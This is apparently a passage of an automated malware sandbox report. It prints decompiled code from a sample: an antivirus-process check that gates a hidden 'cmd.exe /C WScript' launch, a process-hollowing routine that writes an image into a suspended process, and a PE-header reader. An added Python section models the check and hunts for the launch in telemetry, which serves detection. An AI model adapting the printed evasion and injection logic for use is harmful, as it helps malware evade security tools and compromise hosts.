			/* try each PID in turn; the first successful injection ends the routine */
			_t48 = E035D29E0(_t71, 0x35d0000, _t75,  &_v740, 0x288,  &_v8, E035D6CA0);
			_t82 = _t82 + 0x18;
			if(_t48 != 0 && _v8 != 0) {
				goto L24;
			}
			L18:
			_t79 = _t79 + 1;
		} while (_t79 < _t70);
		_t74 = _a4;                    /* no target worked: fall back to the WScript launch */
		goto L22;
	}
	_t61 = E035D7EF0("vsserv.exe");
	_t84 = _t84 + 4;
	if(_t61 != 0) {
		goto L10;
	}
	_t62 = E035D7EF0("cfp.exe");
	_t84 = _t84 + 4;
	if(_t62 != 0) {
		goto L10;
	}
	_t63 = E035D7EF0("ccavsrv.exe");
	_t84 = _t84 + 4;
	if(_t63 != 0) {
		goto L10;
	}
	_t64 = E035D7EF0("cmdagent.exe");
	_t84 = _t84 + 4;
	if(_t64 != 0) {
		goto L10;
	}
	_t65 = E035D7EF0("avp.exe");
	_t84 = _t84 + 4;
	if(_t65 != 0) {
		goto L10;
	}
	_t66 = E035D7EF0("avpui.exe");
	_t84 = _t84 + 4;
	if(_t66 != 0) {
                                                                                                                                          					goto L10;
                                                                                                                                          				}
                                                                                                                                          				_t67 = E035D7EF0("ksde.exe");
                                                                                                                                          				_t82 = _t84 + 4;
                                                                                                                                          				if(_t67 == 0) {
                                                                                                                                          					goto L22;
                                                                                                                                          				}
                                                                                                                                          				goto L10;
                                                                                                                                           			}

                                                                                                                                           Instruction addresses (decompiler side column, range 0x035d6a40 to 0x035d6c9a; the per-line mapping to the C code above is not recoverable from the extracted text)

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7ED0: GetFileAttributesW.KERNEL32(?,?,035D31D3,035D47C4,035D47C4,\System32\wuapp.exe,035D47C4,?,00000000), ref: 035D7ED6
                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 035D6B91
                                                                                                                                            • Part of subcall function 035D7EF0: Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 035D7F24
                                                                                                                                            • Part of subcall function 035D7EF0: Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 035D7F48
                                                                                                                                            • Part of subcall function 035D7EF0: Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 035D7F6D
                                                                                                                                            • Part of subcall function 035D7EF0: CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 035D7F77
                                                                                                                                            • Part of subcall function 035D7EF0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 035D7F86
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 035D6C7E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 035D6C8D
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 035D6C92
                                                                                                                                            • Part of subcall function 035D7EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 035D7F08
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandle$Process32$CreateNextProcess$AttributesCurrentFileFirstSnapshotToolhelp32
                                                                                                                                          • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                                                          • API String ID: 3996573972-1880040858
                                                                                                                                          • Opcode ID: 27af93bd5e61f00db006e703fb7d4df77feecb59699833732f46214026641d8a
                                                                                                                                          • Instruction ID: babfa19424439c2c8d4636593aff1a34d0799f62794e6324282ac2c169fc5aec
                                                                                                                                          • Opcode Fuzzy Hash: 27af93bd5e61f00db006e703fb7d4df77feecb59699833732f46214026641d8a
                                                                                                                                          • Instruction Fuzzy Hash: 0E51BE75D803066AFB30EBA8BD45FAFB27DBB44784F880064E904A50B1F771E646C6A5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
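The function above is the sample's anti-AV gate: for each image name in a fixed list it walks a Toolhelp32 snapshot (Process32First/Process32Next inside E035D7EF0), and a single hit branches to L10 and skips the CreateProcessW at 035D6C7E, which otherwise launches `cmd.exe /C WScript "..."` with dwCreationFlags 0x08000000 (CREATE_NO_WINDOW). The following is an added example by the editor, not code from the sample or from Joe Sandbox, that models that gate against a process snapshot and adds a small hunt helper for the launch form. Assumptions, labelled in the code as well: the image-name compare is case-insensitive (the decompilation does not show the compare used inside E035D7EF0); `bdagent.exe` and `vsserv.exe` are probed before the names visible in the fragment (they appear only in the String ID list); the command line ends with a closing quote after the script path (the report shows only the prefix `cmd.exe /C WScript "`); the vendor comments on the names are the editor's attribution; all process names, paths and process-creation records are constructed.

```python
"""Added example (editor's, not the sample's or Joe Sandbox's code): a model of the
AV-presence gate in the decompiled function above, plus a hunt helper for the
'cmd.exe /C WScript "..."' launch it falls through to. Every snapshot, path and
process-creation record here is constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Image names the sample probes, one Process32First/Process32Next walk per name
# (E035D7EF0). Names come from the report's String ID list; the order of the
# first two is assumed (they sit before the visible part of the decompilation),
# and the vendor comments are the editor's attribution, not the report's.
AV_PROCESS_NAMES = (
    "bdagent.exe",   # assumed: Bitdefender agent
    "vsserv.exe",    # assumed: Bitdefender service
    "cfp.exe",       # assumed: Comodo firewall
    "ccavsrv.exe",   # assumed: Comodo cloud AV service
    "cmdagent.exe",  # assumed: Comodo agent
    "avp.exe",       # assumed: Kaspersky
    "avpui.exe",     # assumed: Kaspersky UI
    "ksde.exe",      # assumed: Kaspersky secure connection
)

# dwCreationFlags value passed to CreateProcessW at 035D6C7E (CREATE_NO_WINDOW).
CREATE_NO_WINDOW = 0x08000000

# Command line the launch path builds. The report shows only the prefix
# 'cmd.exe /C WScript "'; a closing quote after the script path is assumed.
_LAUNCH_RE = re.compile(
    r'^\s*"?cmd\.exe"?\s+/C\s+WScript\s+"(?P<script>[^"]+)"', re.IGNORECASE
)


def av_products_present(running: list[str]) -> list[str]:
    """Return the probed names found in a snapshot, in the sample's probe order.

    Comparison is case-insensitive. That is an assumption about the compare used
    inside E035D7EF0; szExeFile casing varies across Windows builds, so a
    case-insensitive model errs on the side of predicting the abort."""
    seen = {name.lower() for name in running}
    return [name for name in AV_PROCESS_NAMES if name in seen]


def sample_would_abort(running: list[str]) -> bool:
    """True when any probed product is running: the function branches to L10
    and never reaches the CreateProcessW call at L22."""
    return bool(av_products_present(running))


@dataclass(frozen=True)
class ProcessCreate:
    """Minimal process-creation record (constructed; the shape of a Sysmon
    Event ID 1 or EDR telemetry row)."""
    parent_image: str
    image: str
    command_line: str


def find_wscript_launches(events: list[ProcessCreate]) -> list[tuple[str, str]]:
    """Hunt helper: (parent image, script path) for every cmd.exe spawned with
    the sample's 'cmd.exe /C WScript "..."' form. The parent is reported, not
    filtered: the report flags process injection, so the visible parent may be
    a legitimate host process rather than the dropped executable."""
    hits: list[tuple[str, str]] = []
    for ev in events:
        m = _LAUNCH_RE.match(ev.command_line)
        if m and ev.image.lower().endswith("cmd.exe"):
            hits.append((ev.parent_image, m.group("script")))
    return hits


if __name__ == "__main__":
    # Constructed snapshot: Kaspersky's avp.exe present, so the gate trips.
    snapshot = ["System", "smss.exe", "explorer.exe", "AVP.EXE", "svchost.exe"]
    print("aborts:", sample_would_abort(snapshot), av_products_present(snapshot))
    # Constructed telemetry: one matching launch, one benign cmd.exe.
    events = [
        ProcessCreate(r"C:\Windows\System32\svchost.exe",
                      r"C:\Windows\System32\cmd.exe",
                      r'cmd.exe /C WScript "C:\Users\Public\update.vbs"'),
        ProcessCreate(r"C:\Windows\explorer.exe",
                      r"C:\Windows\System32\cmd.exe", "cmd.exe /C dir"),
    ]
    print(find_wscript_launches(events))
```

For triage, the two halves pair up: a host where `av_products_present` returns a non-empty list is one where this launcher would have stayed silent, while a `find_wscript_launches` hit on a host with none of these products is the path the sample actually took, and the script path it returns is the file to pull (the report's "Drops script at startup location" signature points at where to look).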

                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                          			E035D5E60(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                          				intOrPtr _v8;
                                                                                                                                          				signed int _v16;
                                                                                                                                          				signed int _v20;
                                                                                                                                          				void* _v24;
                                                                                                                                          				intOrPtr _v32;
                                                                                                                                          				void* _v36;
                                                                                                                                          				void* _v40;
                                                                                                                                          				char _v44;
                                                                                                                                          				char _v48;
                                                                                                                                          				signed int _v56;
                                                                                                                                          				char _v60;
                                                                                                                                          				char _v132;
                                                                                                                                          				intOrPtr _v1232;
                                                                                                                                          				intOrPtr _v1236;
                                                                                                                                          				intOrPtr _v1240;
                                                                                                                                          				intOrPtr _v1244;
                                                                                                                                          				intOrPtr _v1324;
                                                                                                                                          				char _v1372;
                                                                                                                                          				signed int _t99;
                                                                                                                                          				int _t107;
                                                                                                                                          				void* _t109;
                                                                                                                                          				void* _t116;
                                                                                                                                          				intOrPtr _t117;
                                                                                                                                          				signed int _t118;
                                                                                                                                          				signed int _t122;
                                                                                                                                          				void* _t132;
                                                                                                                                          				void* _t145;
                                                                                                                                          				void* _t151;
                                                                                                                                          				void* _t153;
                                                                                                                                          				void* _t154;
                                                                                                                                          				signed int _t159;
                                                                                                                                          				void* _t173;
                                                                                                                                          				intOrPtr _t174;
                                                                                                                                          				signed int _t175;
                                                                                                                                          				signed int _t176;
                                                                                                                                          				intOrPtr* _t181;
                                                                                                                                          				signed int _t182;
                                                                                                                                          				intOrPtr* _t185;
                                                                                                                                          				signed int _t188;
                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                          				void* _t199;
                                                                                                                                          				void* _t204;
                                                                                                                                          				void* _t205;
                                                                                                                                          				void* _t208;
                                                                                                                                          				void* _t209;
                                                                                                                                          				void* _t210;
                                                                                                                                          				void* _t223;
                                                                                                                                          				signed int _t225;
                                                                                                                                          
                                                                                                                                          				_t175 = __edx;
                                                                                                                                          				_t154 = __ecx;
                                                                                                                                          				_t153 = _t199;
                                                                                                                                          				_v8 =  *((intOrPtr*)(_t153 + 4));
                                                                                                                                          				E035D1BB0( &_v1372, 0, 0x4d0);
                                                                                                                                          				_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                                                          				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
                                                                                                                                          				_v1324 = 0x100002;
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				asm("movlpd [ebp-0x30], xmm0");
                                                                                                                                          				_t215 =  *_t185 - 0x5a4d;
                                                                                                                                          				if( *_t185 != 0x5a4d) {
                                                                                                                                          					E035D1CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
                                                                                                                                          					_t204 = _t204 + 0x10;
                                                                                                                                          				}
                                                                                                                                          				_t99 = E035D1E50(_t154, _t175, _t215, "ntdll.dll");
                                                                                                                                          				_v20 = _t99;
                                                                                                                                          				_t205 = _t204 + 4;
                                                                                                                                          				_v16 = _t175;
                                                                                                                                          				_t156 = _t99 | _t175;
                                                                                                                                          				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
                                                                                                                                          					L34:
                                                                                                                                          					__eflags = 0;
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
                                                                                                                                          					if( *_t181 != 0x4550) {
                                                                                                                                          						goto L34;
                                                                                                                                          					} else {
                                                                                                                                          						E035D1670( &_v132, 0, 0x44);
                                                                                                                                          						E035D1670( &_v40, 0, 0x10);
                                                                                                                                          						_t208 = _t205 + 0x18;
                                                                                                                                          						_v132 = 0x44;
                                                                                                                                          						_push( &_v40);
                                                                                                                                          						_push( &_v132);
                                                                                                                                          						_push(0);
                                                                                                                                          						_push(0);
                                                                                                                                          						if( *0x37a1bb8 == 0) {
                                                                                                                                          							_push(4);
                                                                                                                                          						} else {
                                                                                                                                          							_push(0x800000c);
                                                                                                                                          						}
                                                                                                                                          						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??);
                                                                                                                                          						_t220 = _t107;
                                                                                                                                          						if(_t107 == 0) {
                                                                                                                                          							goto L34;
                                                                                                                                          						} else {
                                                                                                                                          							_t109 = E035D61F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372);
                                                                                                                                          							_t209 = _t208 + 0x10;
                                                                                                                                          							_t221 = _t109;
                                                                                                                                          							if(_t109 == 0) {
                                                                                                                                          								L33:
                                                                                                                                          								TerminateProcess(_v40, 0);
                                                                                                                                          								CloseHandle(_v36);
                                                                                                                                          								CloseHandle(_v40);
                                                                                                                                          								goto L34;
                                                                                                                                          							} else {
                                                                                                                                          								asm("adc eax, 0x0");
                                                                                                                                          								_t116 = E035D6250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24);
                                                                                                                                          								_t210 = _t209 + 0x20;
                                                                                                                                          								if(_t116 == 0) {
                                                                                                                                          									goto L33;
                                                                                                                                          								} else {
                                                                                                                                          									_t159 =  *((intOrPtr*)(_t181 + 0x34));
                                                                                                                                          									_t176 = _v56;
                                                                                                                                          									_t117 =  *((intOrPtr*)(_t181 + 0x30));
                                                                                                                                          									_v20 = _t159;
                                                                                                                                          									_t223 = _t176 - _t159;
                                                                                                                                          									if(_t223 < 0) {
                                                                                                                                          										L18:
                                                                                                                                          										_t118 = E035D72C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
                                                                                                                                          										_v20 = _t118;
                                                                                                                                          										_v16 = _t176;
                                                                                                                                          										if((_t118 | _t176) == 0 || E035D74D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
                                                                                                                                          											goto L33;
                                                                                                                                          										} else {
                                                                                                                                          											_t188 = _v20;
                                                                                                                                          											if(E035D73C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
                                                                                                                                          												goto L33;
                                                                                                                                          											} else {
                                                                                                                                          												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
                                                                                                                                          												_v24 = 0;
                                                                                                                                          												if(0 >=  *(_t181 + 6)) {
                                                                                                                                          													L27:
                                                                                                                                          													asm("adc eax, 0x0");
                                                                                                                                          													if(E035D74D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
                                                                                                                                          														goto L33;
                                                                                                                                          													} else {
                                                                                                                                          														_t182 = _v16;
                                                                                                                                          														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
                                                                                                                                          														asm("adc ecx, edi");
                                                                                                                                          														_v1240 = 0;
                                                                                                                                          														if(E035D7230(0, _t176, _v36,  &_v1372) == 0 || E035D71A0(0, _t176, _v36) == 0) {
                                                                                                                                          															goto L33;
                                                                                                                                          														} else {
                                                                                                                                          															Sleep(0x1388);
                                                                                                                                          															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                                                          															_v24 = _t132;
                                                                                                                                          															if(_t132 != 0) {
                                                                                                                                          																E035D1BB0(_t132, 0, 0x138);
                                                                                                                                          																E035D74D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
                                                                                                                                          																VirtualFree(_v24, 0, 0x8000);
                                                                                                                                          															}
                                                                                                                                          															CloseHandle(_v36);
                                                                                                                                          															CloseHandle(_v40);
                                                                                                                                          															return _v32;
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          												} else {
                                                                                                                                          													_t192 = _t181 + 0x2c + _t122;
                                                                                                                                          													while(1) {
                                                                                                                                          														asm("adc eax, [ebp-0x4]");
                                                                                                                                          														if(E035D74D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
                                                                                                                                          															goto L33;
                                                                                                                                          														}
                                                                                                                                          														_t145 = E035D6300( *((intOrPtr*)(_t192 + 0x10)));
                                                                                                                                          														_t210 = _t210 + 4;
                                                                                                                                          														asm("adc eax, [ebp-0x4]");
                                                                                                                                          														if(E035D73C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
                                                                                                                                          															goto L33;
                                                                                                                                          														} else {
                                                                                                                                          															_t192 = _t192 + 0x28;
                                                                                                                                          															_t173 = _v24 + 1;
                                                                                                                                          															_v24 = _t173;
                                                                                                                                          															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
                                                                                                                                          																continue;
                                                                                                                                          															} else {
                                                                                                                                          																_t188 = _v20;
                                                                                                                                          																goto L27;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          														goto L35;
                                                                                                                                          													}
                                                                                                                                          													goto L33;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										_t174 = _v60;
                                                                                                                                          										if(_t223 > 0 || _t174 >= _t117) {
                                                                                                                                          											_v16 =  *((intOrPtr*)(_t181 + 0x50));
                                                                                                                                          											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
                                                                                                                                          											_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                                                          											asm("adc eax, [ebp-0x8]");
                                                                                                                                          											_t225 = _t176;
                                                                                                                                          											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
                                                                                                                                          												goto L18;
                                                                                                                                          											} else {
                                                                                                                                          												_t151 = E035D7120(_t176, _v40, _t174, _t176);
                                                                                                                                          												_t227 = _t151;
                                                                                                                                          												if(_t151 != 0) {
                                                                                                                                          													goto L33;
                                                                                                                                          												} else {
                                                                                                                                          													goto L18;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										} else {
                                                                                                                                          											goto L18;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				L35:
                                                                                                                                          			}
                                                                                                                                          0x035d5e60
                                                                                                                                          0x035d5e60
                                                                                                                                          0x035d5e61
                                                                                                                                          0x035d5e70
                                                                                                                                          0x035d5e8c
                                                                                                                                          0x035d5e91
                                                                                                                                          0x035d5e99
                                                                                                                                          0x035d5e9c
                                                                                                                                          0x035d5ea6
                                                                                                                                          0x035d5ea9
                                                                                                                                          0x035d5eae
                                                                                                                                          0x035d5eb1
                                                                                                                                          0x035d5ebe
                                                                                                                                          0x035d5ec3
                                                                                                                                          0x035d5ec3
                                                                                                                                          0x035d5ecb
                                                                                                                                          0x035d5ed2
                                                                                                                                          0x035d5ed5
                                                                                                                                          0x035d5ed8
                                                                                                                                          0x035d5edb
                                                                                                                                          0x035d5edd
                                                                                                                                          0x035d61de
                                                                                                                                          0x035d61df
                                                                                                                                          0x035d61e8
                                                                                                                                          0x035d5eec
                                                                                                                                          0x035d5eef
                                                                                                                                          0x035d5ef7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5efd
                                                                                                                                          0x035d5f05
                                                                                                                                          0x035d5f12
                                                                                                                                          0x035d5f17
                                                                                                                                          0x035d5f1a
                                                                                                                                          0x035d5f2b
                                                                                                                                          0x035d5f2f
                                                                                                                                          0x035d5f30
                                                                                                                                          0x035d5f32
                                                                                                                                          0x035d5f34
                                                                                                                                          0x035d5f3d
                                                                                                                                          0x035d5f36
                                                                                                                                          0x035d5f36
                                                                                                                                          0x035d5f36
                                                                                                                                          0x035d5f4a
                                                                                                                                          0x035d5f50
                                                                                                                                          0x035d5f52
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5f58
                                                                                                                                          0x035d5f68
                                                                                                                                          0x035d5f6d
                                                                                                                                          0x035d5f70
                                                                                                                                          0x035d5f72
                                                                                                                                          0x035d61c3
                                                                                                                                          0x035d61c8
                                                                                                                                          0x035d61d7
                                                                                                                                          0x035d61dc
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5f78
                                                                                                                                          0x035d5f91
                                                                                                                                          0x035d5f9f
                                                                                                                                          0x035d5fa4
                                                                                                                                          0x035d5fa9
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5faf
                                                                                                                                          0x035d5faf
                                                                                                                                          0x035d5fb2
                                                                                                                                          0x035d5fb5
                                                                                                                                          0x035d5fb8
                                                                                                                                          0x035d5fbb
                                                                                                                                          0x035d5fbd
                                                                                                                                          0x035d5ff9
                                                                                                                                          0x035d600c
                                                                                                                                          0x035d6013
                                                                                                                                          0x035d6018
                                                                                                                                          0x035d601b
                                                                                                                                          0x00000000
                                                                                                                                          0x035d603b
                                                                                                                                          0x035d603b
                                                                                                                                          0x035d6055
                                                                                                                                          0x00000000
                                                                                                                                          0x035d605b
                                                                                                                                          0x035d605b
                                                                                                                                          0x035d6061
                                                                                                                                          0x035d606c
                                                                                                                                          0x035d60e2
                                                                                                                                          0x035d60fb
                                                                                                                                          0x035d610a
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6110
                                                                                                                                          0x035d6115
                                                                                                                                          0x035d611a
                                                                                                                                          0x035d612a
                                                                                                                                          0x035d612c
                                                                                                                                          0x035d6139
                                                                                                                                          0x00000000
                                                                                                                                          0x035d614b
                                                                                                                                          0x035d6150
                                                                                                                                          0x035d6164
                                                                                                                                          0x035d616a
                                                                                                                                          0x035d616f
                                                                                                                                          0x035d6179
                                                                                                                                          0x035d6192
                                                                                                                                          0x035d61a1
                                                                                                                                          0x035d61a1
                                                                                                                                          0x035d61b0
                                                                                                                                          0x035d61b5
                                                                                                                                          0x035d61c2
                                                                                                                                          0x035d61c2
                                                                                                                                          0x035d6139
                                                                                                                                          0x035d606e
                                                                                                                                          0x035d6071
                                                                                                                                          0x035d6073
                                                                                                                                          0x035d6088
                                                                                                                                          0x035d6097
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60a0
                                                                                                                                          0x035d60a5
                                                                                                                                          0x035d60b8
                                                                                                                                          0x035d60c7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60cd
                                                                                                                                          0x035d60d0
                                                                                                                                          0x035d60d7
                                                                                                                                          0x035d60d8
                                                                                                                                          0x035d60dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60df
                                                                                                                                          0x035d60df
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60df
                                                                                                                                          0x035d60dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d60c7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6073
                                                                                                                                          0x035d606c
                                                                                                                                          0x035d6055
                                                                                                                                          0x035d5fbf
                                                                                                                                          0x035d5fbf
                                                                                                                                          0x035d5fc2
                                                                                                                                          0x035d5fce
                                                                                                                                          0x035d5fd3
                                                                                                                                          0x035d5fd6
                                                                                                                                          0x035d5fd9
                                                                                                                                          0x035d5fdc
                                                                                                                                          0x035d5fde
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5fe7
                                                                                                                                          0x035d5fec
                                                                                                                                          0x035d5ff1
                                                                                                                                          0x035d5ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d5fc2
                                                                                                                                          0x035d5fbd
                                                                                                                                          0x035d5fa9
                                                                                                                                          0x035d5f72
                                                                                                                                          0x035d5f52
                                                                                                                                          0x035d5ef7
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 035D5F4A
                                                                                                                                          • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 035D6150
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 035D6164
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 035D61A1
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 035D61B0
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 035D61B5
                                                                                                                                            • Part of subcall function 035D74D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,035DC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 035D74FF
                                                                                                                                            • Part of subcall function 035D73C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 035D7429
                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,035D49E6,?), ref: 035D61C8
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,035D49E6,?), ref: 035D61D7
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,035D49E6,?), ref: 035D61DC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandleProcess$CurrentVirtual$AllocCreateFreeSleepTerminate
                                                                                                                                          • String ID: 0125789244697858$ntdll.dll
                                                                                                                                          • API String ID: 1806556286-2057982665
                                                                                                                                          • Opcode ID: c0de727103e4e6004e929020a453a56e0b7f8f520121e76c2d334da0a61a83aa
                                                                                                                                          • Instruction ID: 7188e2ef643cfc59653bb36a415f2f5366846f1f460fd7a21b271c7ac017dee9
                                                                                                                                          • Opcode Fuzzy Hash: c0de727103e4e6004e929020a453a56e0b7f8f520121e76c2d334da0a61a83aa
                                                                                                                                          • Instruction Fuzzy Hash: D4B16F71D0020ABBEF20DF98ED41FAEF7B9FF44300F584055EA04A61A1E771AA55DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                          			E035D5A50(void* __ecx, void* _a4, void* _a8, long* _a12, long* _a16) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				void* _t31;
                                                                                                                                          				int _t32;
                                                                                                                                          				int _t36;
                                                                                                                                          				void* _t44;
                                                                                                                                          				long _t46;
                                                                                                                                          				void* _t56;
                                                                                                                                          				void* _t60;
                                                                                                                                          
				/* Decompiled routine (cleaned up): reads the PE headers of a module mapped
				   in another process and returns its SizeOfImage (*_a12) and
				   AddressOfEntryPoint (*_a16). _a4 = process handle, _a8 = remote image base. */
				 *_a12 = 0;
				 *_a16 = 0;
				/* Read the IMAGE_DOS_HEADER (0x40 bytes) from the remote process.
				   VirtualAlloc flags: 0x3000 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE. */
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {              /* "MZ" signature check */
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));  /* e_lfanew: offset of IMAGE_NT_HEADERS */
							VirtualFree(_t56, 0, 0x8000);         /* 0x8000 = MEM_RELEASE */
							/* Read Signature + IMAGE_FILE_HEADER (0x18 bytes). */
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;                       /* remote address of IMAGE_NT_HEADERS */
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								if(_t32 == 0 ||  *_t44 != 0x4550) {   /* "PE\0\0" signature check */
									L10:
									VirtualFree(_t44, 0, 0x8000);
									goto L11;
								} else {
									/* Full NT headers size = 0x18 + FileHeader.SizeOfOptionalHeader (at +0x14).
									   The field is read before the buffer is released (the raw decompiler
									   listing ordered it after the free). */
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									VirtualFree(_t44, 0, 0x8000);
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												VirtualFree(_t60, 0, 0x8000);
												goto L11;
											} else {
												 *_a12 =  *(_t60 + 0x50);   /* OptionalHeader.SizeOfImage */
												 *_a16 =  *(_t60 + 0x28);   /* OptionalHeader.AddressOfEntryPoint */
												VirtualFree(_t60, 0, 0x8000);
												return 1;
											}
										} else {
											VirtualFree(_t60, 0, 0x8000);
											goto L11;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}


APIs
